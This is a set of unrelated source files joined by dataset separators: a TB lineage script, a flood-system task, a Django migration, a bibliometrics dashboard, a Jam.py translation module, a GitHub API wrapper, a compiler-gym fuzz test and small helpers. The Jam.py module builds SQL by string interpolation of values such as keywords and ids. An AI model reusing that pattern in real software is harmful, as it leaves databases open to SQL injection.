|
<gh_stars>0
#! /usr/bin/python
import sys
""" This script accepts the final annotation file and the lineage marker SNPs file """
""" and infers the lineage and possible sublineage classification of the isolate """
""" it requires a sample ID name (string) and an output file name(string) """
"""
Author: <NAME>
CPTR ReSeqTB Project - Critical Path Institute
"""
input1 = sys.argv[1]
input2 = sys.argv[2]
input3 = sys.argv[3]
input4 = sys.argv[4]
fh1 = open(input1, 'r')
sublinn = ""
(lineage,position,ref,alt) = ([],[],[],[])
prevlin = []
prevsub = []
tribes = ["lineages","Indo-Oceanic","East-Asian","East-African-Indian","Euro-American","West-Africa 1","West-Africa 2","Ethiopian"]
(concord,discord,concord1,discord1,count) = (0,0,0,0,0)
discordance = False
sublinneage = False
linfour = ""
hrv37 = ""
BOV = ""
BOV_AFRI = ""
for lines in fh1:
if lines.startswith('#'):
continue
fields = lines.rstrip("\r\n").split("\t")
lineage.append(fields[0])
position.append(fields[1])
ref.append(fields[2])
alt.append(fields[3])
fh1.close()
fh2 = open(input2,'r')
for lines in fh2:
count += 1
fields = lines.rstrip("\r\n").split("\t")
if fields[2] == '931123':
linfour = fields[2]
if fields[2] == '1759252':
hrv37 = fields[2]
if fields[2] == '2831482':
BOV = fields[2]
if fields[2] == '1882180':
BOV_AFRI = '1882180'
if fields[2] in position:
ind = position.index(fields[2])
if alt[ind] == fields[4]:
if len(lineage[ind]) > 1:
sublin = lineage[ind]
prevsub.append(sublin)
sublinn = prevsub[0]
print "SNP" + " " + position[ind] + " " + "suggests sub-lineage: " + lineage[ind]
if prevsub[0] != sublin:
discord += 1
else:
concord +=1
for i in range(0,len(prevsub)):
if len(sublinn) < len(prevsub[i]) :
sublinn = prevsub[i]
else:
lin = lineage[ind]
prevlin.append(lin)
print "SNP" + " " + position[ind] + " " + "suggests lineage: " + lineage[ind]
if prevlin[0] != lin:
discord1 += 1
else:
concord1 += 1
fh2.close()
fh3 = open(input3,'w')
print >> fh3, "Sample ID" + "\t" + "Lineage" + "\t" + "Lineage Name" + "\t" + "Sublineage"
split_first = ['NA']
if len(prevsub) > 0:
split_first = sublinn.split(".")
sublinneage = True
if len(prevlin) == 0:
if len(BOV) > 0:
print "Lineage: " + "BOV"
print >> fh3, input4 + "\t" + "BOV" + "\t" + "Bovis" + "\t" + "NA"
if len(BOV) == 0 or len(BOV_AFRI) == 0:
for i in range(0,len(prevsub)):
split_lin = prevsub[i].split(".")
if split_lin[0] != split_first[0]:
discordance = True
if split_lin[1] != split_first[1]:
discordance = True
if discordance:
print "no precise lineage inferred"
print >> fh3, "no precise lineage inferred"
sys.exit(1)
else:
if len(split_first) > 1:
print "Lineage: " + split_first[0] + " : " + tribes[int(split_first[0])]
print "Sub-lineage: " + sublinn
print >> fh3, input4 + "\t" + split_first[0] + "\t" + tribes[int(split_first[0])] + "\t" + sublinn
elif len(linfour) < 2:
print "Absence of SNP 931123 suggests lineage 4"
print "Lineage: " + "4" + " : " + "Euro-American"
if len(hrv37) > 2:
print >> fh3, input4 + "\t" + "4" + "\t" + "Euro American" + "\t" + "NA"
elif len(hrv37) < 2:
print "Absence of SNP 1759252 suggests sublineage 4.9"
print >> fh3, input4 + "\t" + "4" + "\t" + "Euro American" + "\t" + "4.9"
else:
print "No Informative SNPs detected"
print >> fh3, "No Informative SNPs detected"
else:
if len(prevlin) > 1:
for j in range(0,len(prevlin)):
if prevlin[0] != prevlin[j]:
discordance = True
if discordance == True:
print "no concordance between predicted lineage and sublineage(s)"
print >> fh3, "no concordance between predicted lineage and sublineage(s)"
sys.exit(1)
else:
if len(sublinn) < 1:
print "Lineage: " + prevlin[0] + " " + tribes[int(prevlin[0])]
print >> fh3, input4 + "\t" + prevlin[0] + "\t" + tribes[int(prevlin[0])] + "\t" + "NA"
elif len(sublinn) > 1:
for i in range(0,len(prevsub)):
split_lin = prevsub[i].split(".")
if split_lin[0] != prevlin[0] and split_lin[0] != 'BOV_AFRI':
discordance = True
if split_lin[0] != split_first[0]:
discordance = True
if discordance:
print "no precise lineage inferred"
print >> fh3, "no precise lineage inferred"
sys.exit(1)
else:
print "Lineage: " + prevlin[0] + " " + tribes[int(prevlin[0])]
if sublinn.startswith('BOV_A'):
print >> fh3, input4 + "\t" + prevlin[0] + "\t" + tribes[int(prevlin[0])] + "\t" + "NA"
else:
print "Sub-lineage: " + sublinn
print >> fh3, input4 + "\t" + prevlin[0] + "\t" + tribes[int(prevlin[0])] + "\t" + sublinn
|
StarcoderdataPython
|
3379590
|
<gh_stars>0
from floodsystem.stationdata import build_station_list
from floodsystem.geo import stations_within_radius
def run():
"""Requirements for Task 1C"""
r = 10
p = (52.2053, 0.1218)
stations = build_station_list()
stations = stations_within_radius(stations, p, r)
print(sorted([station.name for station in stations]))
if __name__ == "__main__":
print("*** Task 1C: CUED Part IA Flood Warning System ***")
run()
|
StarcoderdataPython
|
38438
|
# Generated by Django 4.0 on 2022-01-13 10:17
import uuid
import ckeditor_uploader.fields
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('funuser', '0004_alter_funuser_avatar'),
('auth', '0012_alter_user_first_name_max_length'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Fnotification',
fields=[
('id',
models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
serialize=False,
unique=True)),
('title',
models.CharField(
max_length=64,
verbose_name='Title')),
('content',
ckeditor_uploader.fields.RichTextUploadingField(
max_length=2048,
verbose_name='Content')),
('additional_files',
models.FileField(
help_text='If you have more than one file, please package them and upload them.',
upload_to='',
verbose_name='Additional files')),
('DOC',
models.DateTimeField(
auto_now_add=True,
verbose_name='Date of creating')),
('DOU',
models.DateTimeField(
auto_now=True,
verbose_name='Date of updating')),
('comment',
models.TextField(
max_length=128,
verbose_name='Comment')),
('groups',
models.ManyToManyField(
blank=True,
                     help_text='The groups this notification belongs to. All users in the selected groups will receive the notification; if no groups are set, all users will receive it.',
related_name='notification_set',
related_query_name='notification',
to='auth.Group',
verbose_name='groups')),
('poster',
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='funuser.funuser',
verbose_name='Author')),
('readers',
models.ManyToManyField(
blank=True,
related_name='reader_set',
related_query_name='reader',
to=settings.AUTH_USER_MODEL,
verbose_name='Reader')),
],
options={
'verbose_name': 'Notification',
'verbose_name_plural': 'Notifications',
},
),
]
|
StarcoderdataPython
|
4830078
|
<gh_stars>1-10
import textwrap
import re
import ipywidgets as widgets
import matplotlib.pyplot as pyplot
import numpy as np
import pandas as pd
from pyvis.network import Network
import matplotlib
import networkx as nx
import techminer.core.dashboard as dash
from techminer.core import (
Dashboard,
Network,
TF_matrix,
add_counters_to_axis,
corpus_filter,
exclude_terms,
normalize_network,
sort_by_axis,
explode,
)
# from techminer.core.params import EXCLUDE_COLS
from techminer.core import cluster_table_to_list
from techminer.core.dashboard import fig_height, fig_width, max_items, min_occurrence
from techminer.plots import ChordDiagram
from techminer.plots import bubble_plot as bubble_plot_
from techminer.plots import counters_to_node_colors, counters_to_node_sizes
from techminer.plots import heatmap as heatmap_
from techminer.plots import (
ax_text_node_labels,
expand_ax_limits,
)
from techminer.plots import set_spines_invisible
from ipywidgets import GridspecLayout, Layout
from techminer.core.filter_records import filter_records
###############################################################################
##
## MODEL
##
###############################################################################
class Model:
def __init__(
self,
data,
top_n,
limit_to,
exclude,
years_range,
clusters=None,
cluster=None,
):
#
if years_range is not None:
initial_year, final_year = years_range
data = data[(data.Year >= initial_year) & (data.Year <= final_year)]
#
# Filter for cluster members
#
if clusters is not None and cluster is not None:
data = corpus_filter(data=data, clusters=clusters, cluster=cluster)
self.data = data
self.limit_to = limit_to
self.exclude = exclude
self.top_n = top_n
self.clusters = clusters
self.cluster = cluster
self.colormap = None
self.column = None
self.height = None
self.keyword_a = None
self.keyword_b = None
self.max_items = None
self.min_occ = None
self.normalization = None
self.width = None
def radial_diagram(self):
##
## Computes TF_matrix with occurrence >= min_occurrence
##
TF_matrix_ = TF_matrix(
data=self.data,
column=self.column,
scheme=None,
min_occurrence=self.min_occ,
)
##
## Exclude Terms
##
TF_matrix_ = exclude_terms(data=TF_matrix_, axis=1)
##
## Adds counters to axis
##
TF_matrix_ = add_counters_to_axis(
X=TF_matrix_, axis=1, data=self.data, column=self.column
)
##
## Selected Keywords
##
keyword_a = [
w
for w in TF_matrix_.columns.tolist()
if (" ".join(w.split(" ")[:-1]).lower() == self.keyword_a)
]
if len(keyword_a) > 0:
keyword_a = keyword_a[0]
else:
return widgets.HTML("<pre>Keyword A not found in TF matrix</pre>")
keyword_b = [
w
for w in TF_matrix_.columns.tolist()
if (" ".join(w.split(" ")[:-1]).lower() == self.keyword_b)
]
if len(keyword_b) > 0:
keyword_b = keyword_b[0]
else:
return widgets.HTML("<pre>Keyword B not found in TF matrix</pre>")
if keyword_a == keyword_b:
return widgets.HTML("<pre>Keywords must be different!!!</pre>")
##
## Co-occurrence matrix and association index
##
X = np.matmul(
TF_matrix_.transpose().values, TF_matrix_[[keyword_a, keyword_b]].values
)
X = pd.DataFrame(X, columns=[keyword_a, keyword_b], index=TF_matrix_.columns)
##
## Select occurrences > 0
##
X = X[X.sum(axis=1) > 0]
X = X[
X.index.map(lambda w: int(w.split(" ")[-1].split(":")[0])) >= self.min_occ
]
X = sort_by_axis(data=X, sort_by="Num_Documents", ascending=False, axis=0)
link_keyword_a_keyword_b = X.loc[keyword_a, keyword_b]
X = X.head(self.max_items)
max_width = X.max().max()
##
## Network plot
##
matplotlib.rc("font", size=11)
fig = pyplot.Figure(figsize=(self.width, self.height))
ax = fig.subplots()
cmap = pyplot.cm.get_cmap(self.colormap)
nodes = X.index.tolist()
if keyword_a not in nodes:
nodes.append(keyword_a)
if keyword_b not in nodes:
nodes.append(keyword_b)
node_sizes = counters_to_node_sizes(nodes)
node_colors = counters_to_node_colors(x=nodes, cmap=lambda w: w)
node_colors = [cmap(t) for t in node_colors]
G = nx.Graph()
G.add_nodes_from(nodes)
G.add_edge(keyword_a, keyword_b, width=link_keyword_a_keyword_b)
for i, w in zip(X.index, X[keyword_a]):
if i != keyword_a:
G.add_edge(i, keyword_a, width=w)
for i, w in zip(X.index, X[keyword_b]):
if i != keyword_b:
G.add_edge(i, keyword_b, width=w)
##
## Layout
##
pos = nx.spring_layout(G, weight=None)
##
## Draw network edges
##
for e in G.edges.data():
a, b, dict_ = e
edge = [(a, b)]
width = 1.0 + 5.0 * dict_["width"] / max_width
nx.draw_networkx_edges(
G,
pos=pos,
ax=ax,
edgelist=edge,
width=width,
edge_color="k",
node_size=1,
alpha=0.5,
)
##
## Draw network nodes
##
for i_node, _ in enumerate(nodes):
nx.draw_networkx_nodes(
G,
pos,
ax=ax,
nodelist=[nodes[i_node]],
node_size=node_sizes[i_node],
node_color=node_colors[i_node],
node_shape="o",
edgecolors="k",
linewidths=1,
alpha=0.8,
)
xlim = ax.get_xlim()
ylim = ax.get_ylim()
for i_node, label in enumerate(nodes):
x_point, y_point = pos[label]
ax.text(
x_point
+ 0.01 * (xlim[1] - xlim[0])
+ 0.001 * node_sizes[i_node] / 300 * (xlim[1] - xlim[0]),
y_point
- 0.01 * (ylim[1] - ylim[0])
- 0.001 * node_sizes[i_node] / 300 * (ylim[1] - ylim[0]),
s=label,
fontsize=10,
bbox=dict(
facecolor="w",
alpha=1.0,
edgecolor="gray",
boxstyle="round,pad=0.5",
),
horizontalalignment="left",
verticalalignment="top",
)
fig.set_tight_layout(True)
expand_ax_limits(ax)
set_spines_invisible(ax)
ax.set_aspect("equal")
ax.axis("off")
return fig
def concordances(self):
data = self.data.copy()
data["Global_Citations"] = data.Global_Citations.map(int)
data = data[
["Authors", "Historiograph_ID", "Abstract", "Global_Citations"]
].dropna()
data["Authors"] = data.Authors.map(lambda w: w.replace(";", ", "))
data["REF"] = (
data.Authors
+ ". "
+ data.Historiograph_ID
+ ". Times Cited: "
+ data.Global_Citations.map(str)
)
data = data[["REF", "Abstract", "Global_Citations"]]
data["Abstract"] = data.Abstract.map(lambda w: w.split(". "))
data = data.explode("Abstract")
contains_a = data.Abstract.map(lambda w: self.keyword_a.lower() in w.lower())
contains_b = data.Abstract.map(lambda w: self.keyword_b.lower() in w.lower())
data = data[contains_a & contains_b]
if len(data) == 0:
return widgets.HTML("<pre>No concordances found!</pre>")
data = data.groupby(["REF", "Global_Citations"], as_index=False).agg(
{"Abstract": list}
)
data["Abstract"] = data.Abstract.map(lambda w: ". <br><br>".join(w))
data["Abstract"] = data.Abstract.map(lambda w: w + ".")
data = data.sort_values(["Global_Citations", "REF"], ascending=[False, True])
data = data.head(50)
pattern = re.compile(self.keyword_a, re.IGNORECASE)
data["Abstract"] = data.Abstract.map(
lambda w: pattern.sub("<b>" + self.keyword_a.upper() + "</b>", w)
)
pattern = re.compile(self.keyword_b, re.IGNORECASE)
data["Abstract"] = data.Abstract.map(
lambda w: pattern.sub("<b>" + self.keyword_b.upper() + "</b>", w)
)
HTML = ""
for ref, phrase in zip(data.REF, data.Abstract):
HTML += "=" * 100 + "<br>"
HTML += ref + "<br><br>"
phrases = textwrap.wrap(phrase, 80)
for line in phrases:
HTML += line + "<br>"
HTML += "<br>"
return widgets.HTML("<pre>" + HTML + "</pre>")
###############################################################################
##
## DASHBOARD
##
###############################################################################
COLORMAPS = [
"Greys",
"Purples",
"Blues",
"Greens",
"Oranges",
"Reds",
"Pastel1",
"Pastel2",
"tab10",
"tab20",
"tab20b",
"tab20c",
]
class App(Dashboard, Model):
def __init__(
self,
):
data = filter_records(pd.read_csv("corpus.csv"))
Model.__init__(
self,
data=data,
top_n=None,
limit_to=None,
exclude=None,
years_range=None,
)
self.command_panel = [
dash.HTML("Display:", hr=False, margin="0px, 0px, 0px, 5px"),
dash.RadioButtons(
options=[
"Concordances",
"Radial Diagram",
],
description="",
),
dash.HTML("Keywords selection:"),
dash.Dropdown(
options=sorted(data.columns),
description="Column:",
),
dash.Dropdown(options=[], description="Keyword A:"),
dash.Dropdown(options=[], description="Keyword B:"),
dash.min_occurrence(),
dash.max_items(),
dash.HTML("Visualization:"),
dash.cmap(),
dash.fig_width(),
dash.fig_height(),
]
#
# interactive output function
#
widgets.interactive_output(
f=self.interactive_output,
controls={
"menu": self.command_panel[1],
"column": self.command_panel[3],
"keyword_a": self.command_panel[4],
"keyword_b": self.command_panel[5],
"min_occ": self.command_panel[6],
"max_items": self.command_panel[7],
"colormap": self.command_panel[9],
"width": self.command_panel[10],
"height": self.command_panel[11],
},
)
Dashboard.__init__(self)
self.interactive_output(
**{
"menu": self.command_panel[1].value,
"column": self.command_panel[3].value,
}
)
def interactive_output(self, **kwargs):
Dashboard.interactive_output(self, **kwargs)
#
# Populate Keywords with all terms
#
x = explode(self.data, self.column)
all_terms = pd.Series(x[self.column].unique())
all_terms = all_terms[all_terms.map(lambda w: not pd.isna(w))]
all_terms = all_terms.sort_values()
self.command_panel[4].options = all_terms
keywords_ = all_terms
if "Abstract" in self.data.columns:
##
## Selected keyword in the GUI
##
keyword_a = self.command_panel[4].value
##
## Keywords that appear in the same phrase
##
data = self.data.copy()
data = data[["Abstract"]]
data = data.dropna()
data["Abstract"] = data["Abstract"].map(lambda w: w.lower())
data["Abstract"] = data["Abstract"].map(lambda w: w.split(". "))
data = data.explode("Abstract")
##
## Extract phrases contain keyword_a
##
data = data[data.Abstract.map(lambda w: keyword_a in w)]
##
## Extract keywords
##
data["Abstract"] = data.Abstract.map(
lambda w: [k for k in keywords_ if k in w]
)
data = data.explode("Abstract")
all_terms = sorted(set(data.Abstract.tolist()))
self.command_panel[5].options = all_terms
else:
self.command_panel[5].options = keywords_
|
StarcoderdataPython
|
119111
|
import os
import sqlite3
import json
import datetime
from shutil import copyfile
from werkzeug._compat import iteritems, to_bytes, to_unicode
from jam.third_party.filelock import FileLock
import jam
LANG_FIELDS = ['id', 'f_name', 'f_language', 'f_country', 'f_abr', 'f_rtl']
LOCALE_FIELDS = [
'f_decimal_point', 'f_mon_decimal_point',
'f_mon_thousands_sep', 'f_currency_symbol', 'f_frac_digits', 'f_p_cs_precedes',
'f_n_cs_precedes', 'f_p_sep_by_space', 'f_n_sep_by_space', 'f_positive_sign',
'f_negative_sign', 'f_p_sign_posn', 'f_n_sign_posn', 'f_d_fmt', 'f_d_t_fmt'
]
FIELDS = LANG_FIELDS + LOCALE_FIELDS
def lang_con(task):
return sqlite3.connect(os.path.join(task.work_dir, 'langs.sqlite'))
def execute(task, sql, params=None):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
if params:
cursor.execute(sql, params)
else:
cursor.execute(sql)
con.commit()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
def select(task, sql):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute(sql)
result = cursor.fetchall()
con.rollback()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
return result
def copy_table(cursor, name):
cursor.execute('DROP TABLE IF EXISTS SYS_%s' % name)
cursor.execute("SELECT sql FROM LANGS.sqlite_master WHERE type='table' AND name='JAM_%s'" % name)
sql = cursor.fetchone()[0]
cursor.execute(sql.replace('JAM_%s' % name, 'SYS_%s' % name))
cursor.execute('INSERT INTO SYS_%s SELECT * FROM LANGS.JAM_%s' % (name, name))
def update_langs(task):
with task.lock('$langs'):
con = task.create_connection()
try:
cursor = con.cursor()
try:
cursor.execute('ALTER TABLE SYS_PARAMS ADD COLUMN F_JAM_VERSION TEXT')
except:
pass
cursor.execute('SELECT F_JAM_VERSION, F_LANGUAGE FROM SYS_PARAMS')
res = cursor.fetchall()
version = res[0][0]
language = res[0][1]
langs_path = os.path.join(task.work_dir, 'langs.sqlite')
if version != task.app.jam_version or not os.path.exists(langs_path):
# ~ task.log.info('Version changed!')
copyfile(os.path.join(os.path.dirname(jam.__file__), 'langs.sqlite'), langs_path)
os.chmod(os.path.join(task.work_dir, 'langs.sqlite'), 0o666)
cursor.execute('SELECT ID, F_NAME FROM SYS_LANGS')
langs = cursor.fetchall()
langs_list = []
langs_dict = {}
for l in langs:
langs_list.append(l[1])
langs_dict[l[1]] = l[0]
res = select(task, 'SELECT %s FROM JAM_LANGS ORDER BY ID' % ', '.join(FIELDS))
for r in res:
if langs_dict.get(r[1]):
del langs_dict[r[1]]
if not r[1] in langs_list:
fields = ['DELETED']
values = ['?']
field_values = [0]
for i, value in enumerate(r):
if i > 0:
fields.append(FIELDS[i])
values.append('?')
field_values.append(value)
sql = "INSERT INTO SYS_LANGS (%s) VALUES (%s)" % (','.join(fields), ','.join(values))
cursor.execute(sql, (field_values))
del_langs = list(langs_dict.values())
if len(del_langs):
if language in del_langs:
language = 1
sql = "DELETE FROM SYS_LANGS WHERE ID IN (%s)" % ','.join([str(d) for d in del_langs])
cursor.execute(sql)
if language is None:
language = 'NULL'
cursor.execute("UPDATE SYS_PARAMS SET F_JAM_VERSION='%s', F_LANGUAGE=%s" % (task.app.jam_version, language))
con.commit()
finally:
con.close()
def init_locale():
import locale
result = {}
try:
locale.setlocale(locale.LC_ALL, '')
loc = locale.localeconv()
for field in LOCALE_FIELDS:
setting = field[2:]
try:
result[field] = to_unicode(loc[setting], 'utf-8')
except:
result[field] = jam.common.DEFAULT_LOCALE[setting.upper()]
except:
pass
try:
result['f_d_fmt'] = locale.nl_langinfo(locale.D_FMT)
except:
result['f_d_fmt'] = '%Y-%m-%d'
result['f_d_t_fmt'] = '%s %s' % (result['f_d_fmt'], '%H:%M')
return result
def get_lang_dict(task, language):
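    # The two LEFT OUTER JOINs below fall back to the default language (id 1) whenever the
    # requested language has no value, or only a blank value, for a given keyword.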
res = select(task, '''
SELECT K.F_KEYWORD,
CASE WHEN TRIM(V1.F_VALUE) <> ''
THEN V1.F_VALUE
ELSE V2.F_VALUE
END
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (language, 1))
result = {}
for key, value in res:
result[key] = value
return result
def get_locale_dict(task, language):
result = {}
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT %s FROM SYS_LANGS WHERE ID=%s' % (', '.join(LOCALE_FIELDS), language))
res = cursor.fetchall()
if len(res):
for i, field in enumerate(LOCALE_FIELDS):
result[field[2:].upper()] = res[0][i]
else:
raise Exception('Language with id %s is not found' % language)
con.rollback()
except:
result = jam.common.DEFAULT_LOCALE
finally:
con.close()
return result
def get_translation(task, lang1, lang2):
res = select(task, '''
SELECT K.ID, K.F_KEYWORD, V1.F_VALUE, V2.F_VALUE
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (lang1, lang2))
return res
def add_lang(task, lang_id, language, country, name, abr, rtl, copy_lang):
con = lang_con(task)
try:
cursor = con.cursor()
locale = init_locale()
fields = []
values = []
field_values = []
for key, value in iteritems(locale):
fields.append(key)
values.append('?')
field_values.append(to_unicode(value, 'utf-8'))
cursor.execute("INSERT INTO JAM_LANGS (ID, F_LANGUAGE, F_COUNTRY, F_NAME, F_ABR, F_RTL, %s) VALUES (?,?,?,?,?,?,%s)" % (','.join(fields), ','.join(values)),
([lang_id, language, country, name, abr, rtl] + field_values))
if copy_lang:
cursor.execute('''
SELECT JAM_LANG_KEYS.ID, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % copy_lang)
res = cursor.fetchall()
recs = []
for key_id, value in res:
recs.append((key_id, lang_id, value))
cursor.executemany("INSERT INTO JAM_LANG_VALUES(F_KEY, F_LANG, F_VALUE) VALUES (?,?,?)", recs)
con.commit()
langs = task.sys_langs.copy()
langs.set_where(id=lang_id)
langs.open()
if langs.record_count():
langs.edit()
for key, value in iteritems(locale):
langs.field_by_name(key).value = to_unicode(value, 'utf-8')
langs.post()
langs.apply()
finally:
con.close()
def save_lang_field(task, lang_id, field_name, value):
execute(task, 'UPDATE JAM_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('UPDATE SYS_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con.commit()
finally:
con.close()
if task.language == lang_id:
task.update_lang(lang_id)
def save_translation(task, lang_id, key_id, value):
res = select(task, 'SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
if len(res):
execute(task, 'UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
execute(task, 'INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
def add_key(task, key):
result = ''
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("SELECT ID FROM JAM_LANG_KEYS WHERE F_KEYWORD='%s'" % key)
res = cursor.fetchall()
if len(res):
result = 'Keyword exists'
else:
cursor.execute('INSERT INTO JAM_LANG_KEYS (F_KEYWORD) VALUES (?)', (key,))
con.commit()
finally:
con.close()
return result
def del_key(task, key_id):
result = False
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("DELETE FROM JAM_LANG_VALUES WHERE F_KEY=%s" % key_id)
cursor.execute("DELETE FROM JAM_LANG_KEYS WHERE ID=%s" % key_id)
con.commit()
result = True
finally:
con.close()
return result
def get_dict(task, language):
res = select(task, '''
SELECT JAM_LANG_KEYS.F_KEYWORD, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % language)
result = {}
for key, value in res:
result[key] = value
return result
def export_lang(task, lang_id, host):
names = FIELDS[1:]
lang = select(task, 'SELECT %s FROM JAM_LANGS WHERE ID=%s' % (', '.join(names), lang_id))
if len(lang):
language = {}
for i in range(len(lang[0])):
language[names[i]] = lang[0][i]
translation = get_dict(task, lang_id)
content = json.dumps({'language': language, 'translation': translation})
name = language['f_name'].replace(' ', '_')
file_name = '%s_%s.lang' % (name, datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
return {'file_name': file_name, 'content': content}
def import_lang(task, file_path):
error = ''
try:
with open(file_path, 'r') as f:
content = to_unicode(f.read(), 'utf-8')
content = json.loads(content)
language = content['language']
translation = content['translation']
con = lang_con(task)
sys_con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
if len(res):
lang_id = res[0][0]
fields = []
field_values = []
for key, value in iteritems(language):
fields.append('%s=?' % key)
field_values.append(value)
fields = ',' .join(fields)
cursor.execute("UPDATE JAM_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_cursor = sys_con.cursor()
sys_cursor.execute("UPDATE SYS_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_con.commit()
else:
fields = []
values = []
field_values = []
for key, value in iteritems(language):
fields.append(key)
field_values.append(value)
values.append('?')
cursor.execute('INSERT INTO JAM_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
lang_id = res[0][0]
fields.append('DELETED')
values.append('?')
field_values.append(0)
sys_cursor = sys_con.cursor()
sys_cursor.execute('INSERT INTO SYS_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
sys_con.commit()
if lang_id:
cursor.execute('SELECT ID, F_KEYWORD FROM JAM_LANG_KEYS')
res = cursor.fetchall()
keys = {}
for r in res:
keys[r[1]] = r[0]
recs = []
for keyword, value in iteritems(translation):
key_id = keys.get(keyword)
if key_id:
cursor.execute('SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
res = cursor.fetchall()
if len(res):
cursor.execute('UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
cursor.execute('INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
con.commit()
finally:
con.close()
sys_con.close()
except Exception as e:
print(e)
error = 'Can not import language'
|
StarcoderdataPython
|
3258378
|
<filename>github/methods/activity/events/list_network_repository_events.py
from github.scaffold import Scaffold
from github.types import Response
from github.utils import utils
class ListNetworkRepositoryEvents(Scaffold):
"""
List public events for a network of repositories
"""
def list_network_repository_events(
self,
*,
owner: str,
repo: str,
per_page: int = 100,
page: int = None,
) -> 'Response':
"""
List public events for a network of repositories
:param owner:
:param repo:
:param per_page:
Results per page (max "100")
Default: "30"
:param page:
Page number of the results to fetch.
Default: "1"
:return: 'Response'
"""
response = self.get_with_token(
url=f'https://api.github.com/networks/{owner}/{repo}/events',
params={
'per_page': per_page,
'page': page,
}
)
if response.status_code in (200, 304):
return Response._parse(
response=response,
success=True,
result=utils.parse_events(response.json()),
)
elif response.status_code in (301, 403, 404):
return Response._parse(
response=response,
success=False,
)
else:
return Response._parse(
response=response,
success=False,
)
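
# Illustrative call (assumes a client class that mixes in this scaffold and already holds a valid token):
#   response = client.list_network_repository_events(owner="octocat", repo="hello-world", per_page=50)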
|
StarcoderdataPython
|
76635
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Fuzz test for LlvmEnv.validate()."""
import numpy as np
import pytest
from compiler_gym.envs import LlvmEnv
from compiler_gym.errors import BenchmarkInitError
from tests.pytest_plugins.random_util import apply_random_trajectory
from tests.test_main import main
pytest_plugins = ["tests.pytest_plugins.llvm"]
# The uniform range for trajectory lengths.
RANDOM_TRAJECTORY_LENGTH_RANGE = (1, 50)
@pytest.mark.timeout(600)
def test_fuzz(env: LlvmEnv, reward_space: str):
"""This test produces a random trajectory, resets the environment, then
replays the trajectory and checks that it produces the same state.
"""
env.observation_space = "Autophase"
env.reward_space = reward_space
benchmark = env.datasets["generator://csmith-v0"].random_benchmark()
print(benchmark.uri) # For debugging in case of failure.
try:
env.reset(benchmark=benchmark)
except BenchmarkInitError:
return
trajectory = apply_random_trajectory(
env, random_trajectory_length_range=RANDOM_TRAJECTORY_LENGTH_RANGE
)
print(env.state) # For debugging in case of failure.
env.reset(benchmark=benchmark)
for i, (action, observation, reward, done) in enumerate(trajectory, start=1):
print(f"Replaying step {i}: {env.action_space.flags[action]}")
replay_observation, replay_reward, replay_done, info = env.step(action)
assert done == replay_done, info
np.testing.assert_array_almost_equal(observation, replay_observation)
np.testing.assert_almost_equal(reward, replay_reward)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
151052
|
#!/usr/bin/env python
import logging
import os
import sys
import argparse
from torch_scope import run
if __name__ == "__main__":
run()
|
StarcoderdataPython
|
1785882
|
<gh_stars>1-10
from typing import Optional
from uuid import uuid4
from pydantic import BaseModel
from ..context import Context
from ..entity import Entity
from ..event import Event
from ..event_metadata import EventPayloadMetadata, EventMetadata
class EventPayload(BaseModel):
type: str
properties: Optional[dict] = {}
options: Optional[dict] = {}
